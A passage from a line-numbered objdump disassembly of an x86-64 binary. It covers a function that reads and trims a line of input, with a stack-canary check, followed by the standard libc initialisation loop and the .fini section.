0x200(%rsp),%rdi 1169 | 401dc2: 00 1170 | 401dc3: 48 8d b4 24 90 01 00 lea 0x190(%rsp),%rsi 1171 | 401dca: 00 1172 | 401dcb: 48 89 da mov %rbx,%rdx 1173 | 401dce: 89 c1 mov %eax,%ecx 1174 | 401dd0: e8 2b f5 ff ff callq 401300 1175 | 401dd5: eb 6e jmp 401e45 1176 | 401dd7: bf 95 1f 40 00 mov $0x401f95,%edi 1177 | 401ddc: e8 8f ef ff ff callq 400d70 1178 | 401de1: 48 8b 15 58 13 20 00 mov 0x201358(%rip),%rdx # 603140 1179 | 401de8: 48 8d 9c 24 90 01 00 lea 0x190(%rsp),%rbx 1180 | 401def: 00 1181 | 401df0: be 64 00 00 00 mov $0x64,%esi 1182 | 401df5: 48 89 df mov %rbx,%rdi 1183 | 401df8: e8 03 f0 ff ff callq 400e00 1184 | 401dfd: 48 89 df mov %rbx,%rdi 1185 | 401e00: e8 1b f0 ff ff callq 400e20 1186 | 401e05: 85 c0 test %eax,%eax 1187 | 401e07: 7e 27 jle 401e30 1188 | 401e09: 48 c1 e0 20 shl $0x20,%rax 1189 | 401e0d: 48 b9 00 00 00 00 ff movabs $0xffffffff00000000,%rcx 1190 | 401e14: ff ff ff 1191 | 401e17: 48 01 c1 add %rax,%rcx 1192 | 401e1a: 48 c1 f9 20 sar $0x20,%rcx 1193 | 401e1e: 80 bc 0c 90 01 00 00 cmpb $0xa,0x190(%rsp,%rcx,1) 1194 | 401e25: 0a 1195 | 401e26: 75 08 jne 401e30 1196 | 401e28: c6 84 0c 90 01 00 00 movb $0x0,0x190(%rsp,%rcx,1) 1197 | 401e2f: 00 1198 | 401e30: 48 8d bc 24 00 02 00 lea 0x200(%rsp),%rdi 1199 | 401e37: 00 1200 | 401e38: 48 8d b4 24 90 01 00 lea 0x190(%rsp),%rsi 1201 | 401e3f: 00 1202 | 401e40: e8 0b f9 ff ff callq 401750 1203 | 401e45: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 1204 | 401e4c: 00 00 1205 | 401e4e: 48 3b 84 24 68 02 00 cmp 0x268(%rsp),%rax 1206 | 401e55: 00 1207 | 401e56: 75 0b jne 401e63 1208 | 401e58: 31 c0 xor %eax,%eax 1209 | 401e5a: 48 81 c4 70 02 00 00 add $0x270,%rsp 1210 | 401e61: 5b pop %rbx 1211 | 401e62: c3 retq 1212 | 401e63: e8 38 f0 ff ff callq 400ea0 <__stack_chk_fail@plt> 1213 | 401e68: 0f 1f 84 00 00 00 00 nopl 0x0(%rax,%rax,1) 1214 | 401e6f: 00 1215 | 401e70: 41 57 push %r15 1216 | 401e72: 41 89 ff mov %edi,%r15d 1217 | 401e75: 41 56 push %r14 1218 | 401e77: 49 89 f6 mov %rsi,%r14 1219 | 401e7a: 41 55 push %r13 1220 | 401e7c: 49 89 d5 mov %rdx,%r13 1221 | 401e7f: 41 54 push %r12 1222 | 401e81: 4c 8d 25 68 0f 20 00 lea 0x200f68(%rip),%r12 # 602df0 1223 | 401e88: 55 push %rbp 1224 | 401e89: 48 8d 2d 68 0f 20 00 lea 0x200f68(%rip),%rbp # 602df8 1225 | 401e90: 53 push %rbx 1226 | 401e91: 4c 29 e5 sub %r12,%rbp 1227 | 401e94: 31 db xor %ebx,%ebx 1228 | 401e96: 48 c1 fd 03 sar $0x3,%rbp 1229 | 401e9a: 48 83 ec 08 sub $0x8,%rsp 1230 | 401e9e: e8 55 ee ff ff callq 400cf8 1231 | 401ea3: 48 85 ed test %rbp,%rbp 1232 | 401ea6: 74 1e je 401ec6 1233 | 401ea8: 0f 1f 84 00 00 00 00 nopl 0x0(%rax,%rax,1) 1234 | 401eaf: 00 1235 | 401eb0: 4c 89 ea mov %r13,%rdx 1236 | 401eb3: 4c 89 f6 mov %r14,%rsi 1237 | 401eb6: 44 89 ff mov %r15d,%edi 1238 | 401eb9: 41 ff 14 dc callq *(%r12,%rbx,8) 1239 | 401ebd: 48 83 c3 01 add $0x1,%rbx 1240 | 401ec1: 48 39 eb cmp %rbp,%rbx 1241 | 401ec4: 75 ea jne 401eb0 1242 | 401ec6: 48 83 c4 08 add $0x8,%rsp 1243 | 401eca: 5b pop %rbx 1244 | 401ecb: 5d pop %rbp 1245 | 401ecc: 41 5c pop %r12 1246 | 401ece: 41 5d pop %r13 1247 | 401ed0: 41 5e pop %r14 1248 | 401ed2: 41 5f pop %r15 1249 | 401ed4: c3 retq 1250 | 401ed5: 66 66 2e 0f 1f 84 00 data16 nopw %cs:0x0(%rax,%rax,1) 1251 | 401edc: 00 00 00 00 1252 | 401ee0: f3 c3 repz retq 1253 | 1254 | Disassembly of section .fini: 1255 | 1256 | 0000000000401ee4 <.fini>: 1257 | 401ee4: 48 83 ec 08 sub $0x8,%rsp 1258 | 401ee8: 48 83 c4 08 add $0x8,%rsp 1259 | 401eec: c3 retq 1260 | --------------------------------------------------------------------------------